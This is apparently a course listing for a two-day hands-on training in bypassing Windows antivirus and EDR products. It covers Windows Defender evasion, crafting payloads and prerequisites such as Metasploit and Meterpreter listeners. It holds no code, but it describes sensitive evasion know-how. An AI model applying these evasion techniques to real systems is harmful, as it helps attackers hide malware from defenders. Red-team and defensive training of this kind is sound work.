Training Details

Training Duration: 2 Days

This two days hands-on training will teach the basics on how Antivirus (AV) and Endpoint Detection Response (EDR) products work, and modern techniques to get around them. The training is based on Windows based AV and EDR products only. On day one, students will learn how modern AVs operate, and how to bypass them. Windows Defender will be the focus, and at the end of day one, students will be able to bypass it. The primarily focus for day two will be on how EDRs operate and which modern techniques can allow to bypass detection.

The training will contain multiple demos and exercises for the students to practice the various concepts explained throughout the two days. At the end of the training, the students will have gained enough knowledge to craft their own payloads and chain the various techniques to bypass AVs and EDRs. The training is intended for penetration testers that want to improve their red teaming capabilities, or for blue team people that are curious to learn which techniques adversaries might be using to get around these products.



  • Basic programming knowledge. The training focus will be on C# and some C++ in Visual Studio (and Linux). C# and C++ strong knowledge is not required, only some basic ability to modify, update, and compile code examples. The demos will explain step by step how to.
  • A Windows 10 Virtual Machine (VM) with Visual Studio 2022 with the following components: .NET desktop development, Universal Windows Platform Development. Students will need to be able to compile C# and C++ files. A ready to use VM (OVA format with instructions for setup in VirtualBox or VMWare Players) will be available for students that need it. Students will also need the ability to communicate from the Windows 10 VM to their VM running Metasploit Framework (see below).
  • A VM running Metasploit Framework (Kali for example) and basic knowledge on how to generate Meterpreter payloads and setup a Meterpreter listener. This VM will also need Python3, pip3 and mingw-w64 installed.
  • Basic knowledge on operating systems internals: processes, threads, process virtual memory, kernel land vs user land.